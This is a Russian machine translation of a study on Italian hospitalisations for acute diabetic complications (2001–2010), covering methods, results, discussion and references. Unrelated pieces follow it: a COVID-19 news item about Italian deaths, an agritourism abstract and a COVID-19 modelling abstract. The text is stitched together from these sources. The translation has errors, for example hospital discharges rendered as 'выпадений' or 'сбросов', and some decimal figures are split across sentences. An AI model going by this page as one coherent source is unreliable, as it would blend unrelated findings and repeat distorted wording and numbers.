Ретроспективный обзор медицинских карт пациентов с первичной или вторичной выпиской диагнозом острых гипергликемических осложнений (коды 250.1, 250.2, 250.3 МКБ-9-CM) или гипогликемической комы (код 251.0 МКБ-9-CM) был проведен в период 2001–2010 гг. Были рассчитаны стандартизованные показатели по возрасту и полу для итальянского населения 2001 года и населения с диабетом. Мы выявили 7 601 883 выписанных из больниц по поводу диабета. Из них 266 374 (3.5%) были вызваны ADC, либо кетоацидозом / гиперосмолярностью (94,4%), либо гипогликемической комой (5,6%). Частота выписки из ADC снизилась на 51,1% с 2001 по 2010 год (14,4 против 7,1 частоты выписок на 1000 человек с диабетом; снижение на 5,7% в год, тест на тенденцию, p <0,001) с аналогичной тенденцией как для гипергликемических, так и для гипогликемических осложнений. . У людей с сахарным диабетом в более молодых возрастных группах (≤19 лет и 20–44 года) частота выпадений из-за ADC была значительно выше, чем у людей в возрасте 65 лет и старше (≤19 10-кратное увеличение; 20-44: 2-кратное увеличение) .Уровень госпитальной смертности составил 7,6%, из них 211 предотвратимых смертей среди молодых людей с диабетом (≤44 лет). Между регионами Италии наблюдались большие различия, и соотношение между самым высоким и самым низким уровнем сбросов в регионе достигло 300% в 2010 году.

Выводы

Уменьшение временной тенденции госпитализаций по поводу предотвратимых ADC предполагает улучшение амбулаторной помощи. Однако у более молодых пациентов с диабетом как частота госпитализаций, так и внутрибольничная смертность по-прежнему вызывают озабоченность.

Образец цитирования: Lombardo F, Maggini M, Gruden G, Bruno G (2013) Временные тенденции в госпитализации по поводу острых диабетических осложнений: общенациональное исследование, Италия, 2001–2010 гг. PLoS ONE 8 (5): e63675. https://doi.org/10.1371/journal.pone.0063675

Редактор: Марко Джорджио Барони, Римский университет Ла Сапиенца, Италия

Поступила: 17 января 2013 г .; Принята к печати: 5 апреля 2013 г .; Опубликовано: 23 мая 2013 г.

Авторские права: © 2013 Lombardo et al.Это статья в открытом доступе, распространяемая в соответствии с условиями лицензии Creative Commons Attribution License, которая разрешает неограниченное использование, распространение и воспроизведение на любом носителе при условии указания автора и источника.

Финансирование: Эта работа была поддержана Пьемонтским регионом, отделом профилактики диабета. Финансирующие организации не играли никакой роли в дизайне исследования, сборе и анализе данных, принятии решения о публикации или подготовке рукописи.

Конкурирующие интересы: Авторы заявили, что конкурирующих интересов не существует.

Введение

Интервенционные исследования убедительно продемонстрировали важность поддержания хорошего гликемического контроля с течением времени для снижения частоты микро- и макрососудистых осложнений у пациентов с сахарным диабетом как 1-го, так и 2-го типа [1] — [3]. Однако тяжелая гипогликемия является основным побочным эффектом глюкозоснижающей терапии, и есть опасения по поводу потенциального риска сердечно-сосудистых событий и смертности у пациентов, испытывающих тяжелые эпизоды гипогликемии [4] — [7].Самоконтроль уровня глюкозы в крови (SMBG) все чаще используется пациентами с диабетом за последнее десятилетие; однако подгруппы пациентов с сахарным диабетом, такие как дети, подростки и пожилые люди с сопутствующими заболеваниями, все еще более склонны к развитию острых диабетических осложнений как гипо-, так и гипергликемии [8] — [9]. Действительно, кетоацидоз и гиперосмолярность являются основной причиной смертности как у детей, так и у молодых людей с диабетом 1 типа [10] — [11], а низкий социально-экономический уровень и плохое образование повышают риск этих событий [12].Более того, при диабете 2 типа острые гипергликемические осложнения могут быть провоцирующими факторами, а также основными последствиями сопутствующих заболеваний, таких как когнитивные нарушения и сердечно-сосудистые заболевания.

Госпитализацию по поводу острых диабетических осложнений часто можно избежать, и смертность, связанная с этими событиями, является дозорным событием для здоровья в связи с неадекватностью амбулаторной помощи [13], [14]. Повышение доступности диабетических клиник для пациентов разных возрастных групп и социально-экономических уровней, а также более активное участие в образовательных программах может снизить риск острых диабетических осложнений.Несмотря на актуальность этого вопроса, в нескольких эпидемиологических исследованиях оценивались изменения частоты госпитализаций по поводу острых диабетических осложнений с течением времени и в пространстве. Кроме того, большинство доступных данных ограничено набором либо людей, находящихся под опекой в ​​одном центре, либо только детей и подростков [15] — [23].

В Италии Национальная система здравоохранения (NHS) обеспечивает всеобщее медицинское обслуживание всех пациентов с диабетом. В этом общенациональном исследовании мы изучили временную динамику частоты госпитализаций по поводу острых гипергликемических осложнений (кетоацидоз / гиперосмолярность) и гипогликемической комы в период 2001–2010 годов, а также различия в тенденциях между регионами Италии.Мы также оценили, были ли тенденции в отношении госпитализаций и внутрибольничной смертности неоднородными среди возрастных групп.

Методы

Данные о госпитализации (период 2001–2010 гг.) Были получены из Национальной базы данных о выписках из больниц Италии в виде анонимных индивидуальных записей, содержащих как административные, так и клинические данные. Национальная база данных о выписках из больниц, созданная в 1994 году, собирает полные данные о госпитализации как из государственных, так и из частных итальянских больниц.Данные включают возраст, пол, регион проживания, дату госпитализации, продолжительность пребывания в больнице, первичный и до пяти вторичных диагнозов (закодированных в соответствии с МКБ-9-CM) и распоряжения о выписке. В соответствии с итальянским законодательством, ни этическое одобрение, ни индивидуальное письменное согласие взрослых и детей не запрашивались (анонимные агрегированные данные). Госпитализация по поводу диабетического кетоацидоза / гиперосмолярной комы определялась как пациенты с кодами 250.1, 250.2 или 250.3 по МКБ-9-CM в качестве первичного или вторичного диагноза при выписке.Диагностика как гипогликемической комы (код МКБ-9-CM: 251.0), так и диабета (код МКБ-9-CM: 250) требовалась для определения пациента как госпитализированного по поводу гипогликемической комы. Госпитализации по поводу беременности или послеродового периода (группа по диагностике DRG: 370–384) и родов (DRG: 385–391) были исключены из исследования. Повторные госпитализации определялись с использованием уникального анонимного идентификационного кода. Точность кодирования ICD-9-CM улучшилась за период исследования, а доля выписанных из больницы без уникального идентификатора снизилась с 7.От 5% в 2001 году до 1,7% в 2010 году. Показатели госпитализации рассчитывались каждый год как соотношение между количеством выписанных из больниц и постоянным населением на 100000 человек, стандартизированное по возрасту и полу для итальянского населения в 2001 году. Численность населения с разбивкой по полу, возраст, календарный год и регион были получены из Национального статистического управления (ISTAT). Коэффициенты госпитализации пациентов с диабетом в зависимости от возраста и пола были рассчитаны с использованием данных о распространенности диабета в Италии по возрасту и полу, опубликованных ISTAT, и на основе ежегодных национальных опросов с участием около 50 000 семей, репрезентативных для итальянского населения.Оценки распространенности диабета были точными в старших возрастных группах с относительной погрешностью около 2%, в то время как в самых молодых возрастных группах (0–19 лет) наблюдались большие годовые колебания из-за меньшего числа людей, по которым были произведены оценки. на основании. Девяносто пять процентов доверительных интервалов конкретных показателей были рассчитаны с учетом ошибки выборки оценок диабетической популяции. Временные тенденции в частоте госпитализаций оценивались с помощью хи-квадрат для тенденции. Смертность в стационаре была выявлена ​​при выборе всех госпитализаций по поводу острых диабетических осложнений со смертью в качестве места выписки.Показатели внутрибольничной смертности рассчитывались путем деления количества смертей на количество пациентов, госпитализированных по поводу острых осложнений, после исключения выписок без идентификационного кода пациента. Показатели смертности рассчитывались как за год, так и за весь десятилетний период. Анализ данных выполняли с использованием STATA, версия 11 (Stata Corporation LP, College Station, TX, USA).

Результаты

Из 7 601 883 госпитализаций по поводу диабета в период 2001–2010 гг. 266 374 (3.5%) были вызваны острыми диабетическими осложнениями и произошли у 214 899 пациентов (24 153 среднегодового числа) (Таблица 1). Диабетический кетоацидоз / гиперосмолярная кома были преобладающей причиной госпитализации (94,4%), и только 5,6% госпитализированных были из-за гипогликемической комы. При поступлении не было различий между полами. Средний возраст госпитализации составил 65,8 ± 20,4 года (62,7 ± 29,2 у мужчин и 68,6 ± 20,1 у женщин, p <0,001) без значительных изменений за период исследования. Однако возраст госпитализации по поводу гипогликемической комы увеличился с 71 года.От 5 ± 16,0 в 2001 г. до 74,6 ± 15,0 лет в 2010 г. (р <0,001). Гипогликемическая кома была первичным диагнозом в 80,2% выписок. Диабетический кетоацидоз / гиперосмолярная кома был первичным диагнозом только в 39,0% выписок, но были значительные различия между возрастными группами (0–19: 91,1%, 20–44: 68,1%, 45–64: 34,3%, 65 лет и старше. : 28,8%).

Стандартизованная частота госпитализаций по поводу острых осложнений снизилась на 42,5% (56,3 / 100 000 в 2001 г. по сравнению с 32,4 / 100 000 в 2010 г.) за весь период исследования (Таблица 2) с оценкой 4.Снижение на 7% в год (тест на тенденцию, p <0,001), что было одинаковым как для гипергликемических, так и для гипогликемических осложнений. Тенденция к снижению среди диабетиков составила 51,1% (5,7% в год, тест на тенденцию, p <0,001). За тот же период частота госпитализаций по всем причинам (выписки с диабетом в качестве первичного или вторичного диагноза) снизилась всего на 28,9% (333,0 на 1000 человек с диабетом в 2001 году по сравнению с 236,7 на 1000 человек с диабетом в 2010 году; тест на тенденцию, p < 0,001).

Таблица 3 показывает количество госпитализаций на 1000 пациентов с диабетом в разбивке по возрастным группам и календарному году.По сравнению с пациентами с диабетом в возрасте 65 лет и старше, в возрасте 0–44 лет риск госпитализации был в 4 раза выше (в 10 раз в возрастной группе 0–19 лет и в два раза в возрастной группе 20–44 года). . Однако тенденция к снижению в течение календарного периода была довольно схожей для возрастных и гендерных групп. Аналогичные тенденции к снижению с течением времени наблюдались в Северной, Центральной и Южной Италии. Показатели госпитализации на 1 000 больных диабетом в 2010 г. составили 6,2 (95% ДИ, 5,6–6,9), в Северном — 7,5 (95% ДИ, 6,2%).9–8,2) в Центральной и 7,8 (95% ДИ, 7,2–8,5) в Южной Италии (рис. 1). Однако среди регионов Италии была обнаружена большая вариабельность показателей: самый низкий показатель на 1000 больных диабетом — 3,8 (95% ДИ, 3,3–4,4) и самый высокий — 10,8 (95% ДИ, 9,2–13,0).

Повторные госпитализации по поводу острых диабетических осложнений за период 2001–2010 гг. Произошли у 12,4% пациентов (12,1% из-за гипергликемических осложнений и 3,9% из-за гипогликемической комы). Возраст при первой госпитализации этих пациентов составил 57 лет.1 ± 24,9 года для гипергликемических осложнений и 66,9 ± 17,2 года для гипогликемической комы.

В период исследования 16 812 случаев смерти в стационаре было зарегистрировано среди пациентов с диабетом, госпитализированных по поводу острых осложнений, и 16 402 случая были включены в анализ смертности, что дает показатель госпитальной смертности в 7,6% за период исследования без значительных изменений во времени. Уровень госпитальной смертности от гипогликемической комы только в 2010 г. показал заметный, но не статистически значимый рост по сравнению с 2009 г. (3.1% против 1,9, p = 0,06). Из 211 смертей, произошедших среди пациентов в возрасте 0–44 лет, только один был вызван гипогликемической комой и произошел у взрослого пациента с диабетом.

Обсуждение

Это одно из немногих исследований, посвященных количеству госпитализаций по поводу острых диабетических осложнений у диабетиков, и первое общенациональное исследование, охватывающее длительный период. Мы предоставляем доказательства того, что количество госпитализаций по поводу острых диабетических осложнений снизилось на 51% у пациентов с диабетом за десятилетний период, и что степень сокращения была аналогичной для гипогликемической комы и острых гипергликемических осложнений, тогда как снижение частоты госпитализаций по всем причинам было более значительным. ограниченный (-28.9%). Этот вывод актуален, поскольку предполагает общее улучшение качества амбулаторной помощи при диабете со временем в Италии. Тем не менее, госпитальная смертность со временем не улучшилась, пока в 2010 г. 7% пациентов с острыми гипергликемическими осложнениями и 3% пациентов с гипогликемической комой умерли во время госпитализации. Во-вторых, в течение периода исследования наибольшая частота госпитализаций была обнаружена среди самых молодых больных сахарным диабетом. Несмотря на аналогичное снижение с течением времени среди возрастных групп, диабетики в возрасте 19 лет и младше и люди в возрасте 20–44 лет сохраняли в десять и два раза более высокие показатели госпитализации по поводу предотвратимых острых осложнений, соответственно, чем люди в возрасте 65 лет и закончился, в основном из-за кетоацидоза.Среди пациентов с диабетом в возрасте 44 лет и младше госпитальная смертность составила 211 предотвратимых смертей в период 2001–2010 годов. Наконец, хотя тенденция к снижению была аналогичной в Северной, Центральной и Южной Италии, в последней в 2010 году показатели госпитализации оставались выше. Была очевидна трехкратная разница между регионами Италии, что не может быть объяснено различиями в распространенности заболевания и может указывать на неравенство в уходе при всеобщем охвате NHS.

Наши результаты согласуются с исследованиями, показывающими аналогичное снижение риска госпитализаций по поводу острых диабетических осложнений в период 1994–1999 гг. В Канаде [15] и 1998–2006 гг. В США, хотя в последнем случае снижение было ограничено пациентами с диабетом в возрасте 45 лет и старше, в то время как частота оставалась стабильно высокой у самых молодых пациентов [16].В нашем исследовании снижение составило 5,7% в год, причем более чем наполовину за десятилетний период и аналогично среди возрастных групп и полов. Несколько факторов могут быть вовлечены в тенденцию к уменьшению временной тенденции госпитализаций по поводу острых осложнений в разных странах, включая более высокую возможность применения антигипергликемических препаратов в последние годы и широкое использование SMBG. В Италии наблюдалось как улучшение метаболического контроля с течением времени, так и более широкое использование как новых лекарств, так и аналогов инсулина, что может быть связано, по крайней мере частично, с нашими результатами [24], [25].Тем не менее, мы также недавно показали, что до 30% большой репрезентативной популяционной когорты не имели измерения HbA1c в течение предыдущих 12 месяцев [26], и этот неутешительный результат может быть связан с сохраняющейся высокой частотой госпитализаций по поводу острых осложнений. в 2010 году, несмотря на тенденцию к снижению с течением времени.

Особенно неутешительные результаты были обнаружены у людей с диабетом в возрасте 19 лет и младше, у которых в 2010 году частота госпитализаций по поводу острых осложнений была в десять раз выше, чем у пациентов с диабетом в возрасте 65 лет и старше, почти полностью из-за кетоацидоза.В соответствии с этим исследование, проведенное в Шотландии, показало, что люди с диабетом 1 типа часто госпитализировались по поводу диабетической комы [22]. Социально-экономические факторы могут быть вовлечены в частоту госпитализаций по поводу острых диабетических осложнений [8] — [14], [15], [22]. В немецком исследовании у детей с более низким социально-экономическим уровнем был обнаружен в три раза более высокий риск тяжелого кетоацидоза, требующего госпитализации с началом диабета 1 типа [12]. В Финляндии стабильно высокий уровень смертности от острых осложнений наблюдался только при диабете 1 типа у взрослых, тогда как при диабете детского возраста наблюдалось параллельное снижение, что позволяет предположить, что психологическая поддержка подростков и молодых людей может позволить повысить их приверженность к лечению. лечения и снижения риска смертности [10].В Соединенных Штатах не было обнаружено вариаций внутрибольничной смертности от предотвратимых острых осложнений только у молодых пациентов с диабетом [16]. В нашем исследовании за десятилетний период было выявлено 211 предотвратимых внутрибольничных смертей у людей в возрасте 44 лет и младше, почти полностью из-за кетоацидоза, без изменения показателей смертности с течением времени.

Большинство случаев госпитализации по поводу острых осложнений было зарегистрировано у людей в возрасте 65 лет и старше, которые составляют две трети распространенных диабетиков в Италии [24], и отрицательно сказываются на стоимости болезни.Что касается недиабетиков того же возраста и пола, прямые затраты диабетиков в 4 раза выше, и 50% от этой суммы приходится на госпитализации [26]. Хотя острые осложнения составляют лишь 3,5% всех госпитализаций по поводу диабета, их уменьшение будет способствовать снижению затрат на оказание медицинской помощи при диабете. Пожилые пациенты с диабетом обычно характеризуются сопутствующими заболеваниями, которые могут действовать как провоцирующие факторы, а также как основные последствия острых диабетических осложнений.Это может объяснить более высокую долю выписанных пожилых людей с гиперосмолярностью, определяемой как вторичный, а не первичный диагноз. Профилактика посредством соответствующего обучения, улучшения самопомощи и соблюдения режима лечения остается наиболее важным аспектом лечения острых диабетических осложнений.

Наше исследование опирается на данные о выписке из национальных больниц, которые в настоящее время можно считать завершенными. Поскольку мы определили все госпитализации с диабетом, перечисленные как один из диагнозов при выписке, наши данные могли занижать показатели госпитализаций из-за доли госпитализированных пациентов с диабетом, которые были выписаны без упоминания диабета в выписке.В Италии оплата больничной деятельности регулируется системой DRG, и для повышения квалификации врачей были внедрены инструкции по надлежащему заполнению записей о выписке. Что касается диабета, обычно делается упор на включение этого заболевания в качестве вторичного, а не основного диагноза из-за более низкого вознаграждения за него по сравнению с другими заболеваниями. Наши процедуры отбора, включая острые осложнения, определяемые как первичные или вторичные причины выделений, должны были позволить учесть большинство, если не все выделения.

В заключение, это общенациональное исследование показало, что количество госпитализаций по поводу острых диабетических осложнений снизилось на 51% у пациентов с диабетом за десятилетний период, аналогично среди возрастных групп и в случае гипогликемической комы и острых гипергликемических осложнений. Однако внутрибольничная смертность со временем не улучшилась. Более того, самые молодые пациенты с диабетом по-прежнему испытывали самые высокие показатели госпитализации по поводу острых осложнений, в основном кетоацидоза, с соответствующим числом предотвратимых смертей за десятилетний период.Географические различия в пределах Италии могут быть связаны с выборочно более низкой доступностью медицинской помощи в итальянских регионах.

Вклад авторов

Задумал и спроектировал эксперименты: FL GB. Проведены эксперименты: ФЛ ММ ГГ ГБ. Проанализированы данные: ФЛ ММ. Предоставленные реагенты / материалы / инструменты для анализа: FL MM GG GB. Написал бумагу: ФЛ ММ ГГ ГБ. Исследуемые данные: ФЛ ММ ГБ. Участвовал в обсуждении: ММ ГГ. Рецензировал / отредактировал рукопись: ММ ГГ.

Список литературы

  1. 1.Исследовательская группа по контролю диабета и его осложнениям / эпидемиологии вмешательств и осложнений диабета (DCCT / EDIC) (2005). Интенсивное лечение диабета и сердечно-сосудистые заболевания у пациентов с диабетом 1 типа. N Engl J Med 353: 2643–2653.
  2. 2. Holman RR, Paul SK, Bethel MA, Matthews DR, Neil HA (2008) 10-летнее наблюдение за интенсивным контролем уровня глюкозы при диабете 2 типа. N Engl J Med 359: 1577–1589.
  3. 3. Gaede P, Lund-Andersen H, Parving HH, Pedersen O (2008) Влияние многофакторного вмешательства на смертность при диабете 2 типа.N Engl J Med 358: 580–91.
  4. 4. Джонстон С.С., Коннер С., Агрен М., Смит Д.М., Бушард Дж. И др. (2011) Доказательства, связывающие гипогликемические явления с повышенным риском острых сердечно-сосудистых событий у пациентов с диабетом 2 типа. Уход за диабетом 34: 1164–70.
  5. 5. Punthakee Z, Miller ME, Launer LJ, Williamson JD, Lazar RM и др. (2012) Плохая когнитивная функция и риск тяжелой гипогликемии при диабете 2 типа: апостериорный эпидемиологический анализ исследования ACCORD.Уход за диабетом 35: 787–93.
  6. 6. Сиквист Э.Р., Миллер М.Э., Бондс Д.Е., Фейнглос М., Гофф Д.К. мл. И др. (2012) Влияние частой и нераспознанной гипогликемии на смертность в исследовании ACCORD. Уход за диабетом 35: 409–14.
  7. 7. Hsu PF, Sung SH, Cheng HM, Yeh JS, Liu WL и др. (2013) Связь клинической симптоматической гипогликемии с сердечно-сосудистыми событиями и общей смертностью от сахарного диабета 2 типа: общенациональное популяционное исследование. Уход за диабетом 36: 894–900.
  8. 8. Рэндалл Л., Бегович Дж., Хадсон М., Смайли Д., Пэн Л. и др. (2011) Рецидивирующий диабетический кетоацидоз у городских меньшинств: поведенческие, социально-экономические и психосоциальные факторы. Уход за диабетом 34: 1891–6.
  9. 9. Bagdure D, Rewers A, Campagna E, Sills MR (2013) Эпидемиология гипергликемического гиперосмолярного синдрома у детей, госпитализированных в США. Педиатр Диабет 14 (1): 18–24.
  10. 10. Harjutsalo V, Forsblom C, Groop PH (2011) Временные тенденции смертности у пациентов с диабетом 1 типа: общенациональное популяционное когортное исследование.BMJ 343: d5364.
  11. 11. Бруно Дж., Черутти Ф., Мерлетти Ф., Новелли Дж., Панеро Ф. и др. (2009) Краткосрочный риск смертности у детей и молодых людей с диабетом 1 типа: регистр населения провинции Турин, Италия. Нутр Метаб Кардиоваск Дис. 19: 340–344.
  12. 12. Rosenbauer J, Icks A, Giani G (2002) Клинические характеристики и предикторы тяжелого кетоацидоза в начале сахарного диабета 1 типа у детей в регионе Северный Рейн-Вестфалия, Германия.J Pediatr Endocrinol Metab 15: 1137–45.
  13. 13. Билд Д., Гейсс Л.С., Тойч С.М., Габелла Б., Хадспет Б.А. и др. (1988) Дозорный эпиднадзор за событиями, связанными со здоровьем при диабете. Смертность среди лиц моложе 45 лет с диабетом. J Clin Epidemiol 41: 999–1006.
  14. 14. Chen HF, Wang CY, Lee HY, See TT, Chen MH, et al. (2010) Краткосрочная летальность и связанные факторы среди стационарных пациентов с диабетическим кетоацидозом и гипергликемическим гиперосмолярным состоянием: анализ на базе больниц за 15-летний период.Intern Med 49: 729–37.
  15. 15. Booth GL, Hux JE, Fang J, Chan BT (2005) Временные тенденции и географические различия в острых осложнениях диабета в Онтарио, Канада. Уход за диабетом 28: 1045–50.
  16. 16. Ван Дж., Имаи К., Энгельгау М.М., Гейсс Л.С., Вен С. и др. (2009) Светские тенденции в отношении предотвратимых госпитализаций в связи с диабетом в Соединенных Штатах, 1998–2006 гг. Уход за диабетом 32: 1213–7.
  17. 17. Hirasing RA, Reeser HM, de Groot RR, Ruwaard D, van Buuren S и др.(1996) Тенденции госпитализаций среди детей в возрасте 0–19 лет с диабетом I типа в Нидерландах. Уход за диабетом 19: 431–4.
  18. 18. Curtis JR, To T, Muirhead S, Cummings E, Daneman D (2002) Последние тенденции в госпитализации детей из Онтарио по поводу диабетического кетоацидоза. Уход за диабетом 25: 1591–6.
  19. 19. Лю С.К., Чен К.Р., Чен Х.Ф., Хуанг Х.Л., Ко М.К. и др. (2010) Тенденции госпитализации больных диабетом по поводу диабетического кетоацидоза на Тайване: анализ национальных данных о заявках, 1997–2005 гг.J Formos Med Assoc 109: 725–34.
  20. 20. Цзян Х.Дж., Страйер Д., Фридман Б., Эндрюс Р. (2003) Несколько госпитализаций для пациентов с диабетом. Уход за диабетом 26: 1421–6.
  21. 21. Fadini GP, Rigato M, Tiengo A, Avogaro A (2009) Характеристики и смертность пациентов с диабетом 2 типа, госпитализированных по поводу тяжелой ятрогенной гипогликемии. Диабет Res Clin Pract 84: 267–72.
  22. 22. Гован Л., Майетти Е., Торсни Б., Ву О., Бриггс А. и др. (2012) Влияние депривации и HbA1c на госпитализацию по поводу диабетического кетоацидоза при диабете 1 типа.Диабетология 55: 2356–60.
  23. 23. Brodovicz KG, Mehta V, Zhang Q, Zhao C., Davies MJ, et al. (2013) Связь между гипогликемией и стационарной смертностью и продолжительностью пребывания в больнице госпитализированных пациентов, получавших инсулин. Curr Med Res Opin 29: 101–7.
  24. 24. Бруно Дж., Мерлетти Ф., Барджеро Дж., Мелис Д., Маси И. и др. (2008) Изменения во времени в распространенности и качестве лечения диабета 2 типа в Италии: исследования Casale Monferrato, 1988 и 2000 гг.Нутр Метаб Кардиоваск Дис 18: 39–45.
  25. 25. Марчезини Дж., Форлани Дж., Росси Э., Берти А., Де Роса М. и др. (2011) Прямые экономические затраты на фармакологическое лечение диабета в Италии-2006. Обсерватория АРНО. Nutr Metab Cardiovasc Dis 21: 339–46.
  26. 26. Бруно Дж., Пикариелло Р., Петрелли А., Панеро Ф., Коста Дж. И др. (2012) Прямые затраты диабетиков и недиабетиков: популяционное Туринское исследование. Нутр Метаб Кардиовас 22: 684–90.

Коронавирус в Италии: уровень смертности от COVID-19 в Италии продолжает снижаться | Мировые новости

РИМ: Число смертей, связанных с коронавирусом, в Италии выросло до 17669 с момента начала вспышки в конце февраля после скачка на 542 случая за последние 24 часа, что соответствует показателю спада в течение нескольких дней подряд.
Согласно данным, опубликованным Агентством гражданской защиты, количество новых случаев инфицирования и госпитализаций также продолжало снижаться.
Изоляция коронавируса: последние обновления
Общее количество подтвержденных случаев COVID-19 в Италии составляет 139 422, что на 3836 больше, чем во вторник, сообщает Efe news.
В среду директор гражданской защиты Анджело Боррелли предупредил, что население не должно ослаблять бдительности, пока ситуация в стране не будет полностью под контролем.
В настоящее время в Италии зарегистрировано 95 262 активных случая заболевания, и в общей сложности 26 491 человек выздоровели.
По мере улучшения показателей правительство теперь рассматривает вопрос о том, как выполнить так называемую вторую фазу изоляции, которая предполагает постепенное открытие страны.

Подробнее о Covid-19


По словам заместителя директора Всемирной организации здравоохранения Раньери Герра, до сих пор не было установленной даты для такого шага.
Он сказал, что «трудно» думать о повторном открытии страны на данном этапе, добавив, что Италия не находится в стадии снижения своих коронавирусных инфекций, а просто замедляет их.
Герра сказал, что бессимптомные носители среди населения продолжали распространять вирус.
Правительство санкционированного Джузеппе Конте карантина действует как минимум до 13 апреля, что в Италии знаменует конец пасхального периода.
В стране разрешено работать только службам первой необходимости.
Однако, по данным итальянских СМИ, операция по постепенному открытию страны будет проходить в два этапа: во-первых, частичное открытие некоторых компаний с 14 апреля, но широкой общественности и другим предприятиям придется подождать до 4 мая.
Даже тогда будут ограничения, такие как возможное обязательное использование масок и протокол социального дистанцирования.
Конте сообщил комитету, руководящему реагированием на коронавирус, что «здоровье населения является приоритетом, но двигатели страны не могут оставаться на месте слишком долго».
Правительство Италии в среду также заявило, что его порты больше не являются безопасными для высадки мигрантов, спасенных неправительственными организациями в Средиземном море из-за коронавируса, решение было принято после того, как лодка Alan Kurdi, управляемая немецкой неправительственной организацией Sea, запросила разрешение на стыковку с 150 мигранты на борту.

Тенденция спроса на итальянский агротуризм

Тенденция спроса на итальянский агротуризм

Автор (ы)

Я. Охе и А. Чиани

Абстрактные

Спрос на агротуризм в Италии не был полностью исследован, несмотря на относительно большое количество исследований со стороны предложения. Таким образом, эта статья статистически изучены тенденции в спросе на агротуризм в Италии в сравнение с туристическим спросом в целом, например, со спросом на отели.Данные были получено из Annuario Statistico Italiano, отредактировано и выпущено ISTAT (Национальный институт статистики). Данные за 1997 г. сравнивались с данными из 2006. Мы изучили региональные особенности и тенденции в составе внутренние и прибывающие туристы в отношении агротуризма. Результаты как следует. (1) В агротуризме наблюдается быстрый рост количества коек. доступны и тех туристов, которые ночевали в течение последнего десятилетия, в то время как Уровень использования агротуризма намного ниже, чем у туризма в целом.(2) По регионам на центральный регион приходится большая часть агротуризма. спрос и южный регион имели наибольшие темпы роста, в то время как более половины туристический спрос в целом направился на север в случае спроса на отели. (3) На рынок агротуризма приходилось более половины внутреннего спроса. общий спрос на агротуризм. Оставшийся спрос был удовлетворен за счет въезжающих туристов. из европейских стран. Среди приезжающих европейских туристов туристы из Скандинавия, Великобритания и Германия резко увеличились, и, следовательно, эти прибывающие туристы являются движущей силой роста агротуризма в этой стране.Даже если мы рассмотрим конкретные причины низких барьеров для путешествий по Европе, такие как доступность наземных маршрутов, общая валюта без риска, связанного с обменными курсами, и т. д., эти результаты ясно показывают, что это важно для развития агротуризм рассчитывать не только на местных, но и на прибывающих туристов, чтобы поднять скорость работы. Ключевые слова: агротуризм в Италии, туристический спрос, внутренний и въездной туризм.

Ключевые слова

агротуризм в Италии, туристический спрос, внутренний и въездной туризм

Моделирование эпидемиологической тенденции и поведения COVID-19 в Италии

Abstract

По состоянию на 14 мая 2020 года Италия была одной из красных горячих точек пандемии COVID-19.Поскольку с февраля было зарегистрировано более 220000 подтвержденных случаев и почти 33000 подтвержденных случаев смерти, необходимо полностью понимать распространение COVID-19 в этой стране. Автор: S.E.I.R. В ходе моделирования мы оценили наиболее репрезентативное базовое число воспроизводства R0 для трех наиболее пострадавших регионов с 22 февраля по 14 марта 2020 г. При этом мы смогли оценить последовательность первых мер сдерживания до конца апреля, поскольку а также выявить возможные локальные мутации и особенности поведения SARS-CoV-2.Кроме того, с помощью новых оценок уровня смертности от инфекций мы пересчитали более правдоподобное количество реальных инфицированных. Наконец, учитывая абсолютно аномальную тенденцию в регионе Ломбардия, мы искали корреляции между общими случаями COVID-19 и загрязнителями воздуха, такими как PM 10 и PM 2,5.

Заявление о конкурирующем интересе

Авторы заявили об отсутствии конкурирующего интереса.

Отчет о финансировании

Внешнего финансирования получено не было.

Заявления автора

Все соответствующие этические нормы были соблюдены; были получены все необходимые разрешения IRB и / или комитета по этике, а подробная информация об IRB / надзорном органе включена в рукопись.

Да

Получено все необходимое согласие пациента / участника и заархивированы соответствующие институциональные формы.

Да

Я понимаю, что все клинические испытания и любые другие проспективные интервенционные исследования должны быть зарегистрированы в одобренном ICMJE реестре, таком как ClinicalTrials.gov. Я подтверждаю, что любое такое исследование, указанное в рукописи, было зарегистрировано и предоставлен идентификатор регистрации испытания (примечание: при публикации проспективного исследования, зарегистрированного ретроспективно, просьба предоставить заявление в поле идентификатора испытания, объясняющее, почему исследование не было зарегистрировано заранее) .

Да

Я выполнил все соответствующие инструкции по составлению отчетов об исследованиях и загрузил соответствующие контрольные списки для отчетов по исследованиям сети EQUATOR и другие соответствующие материалы в качестве дополнительных файлов, если применимо.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *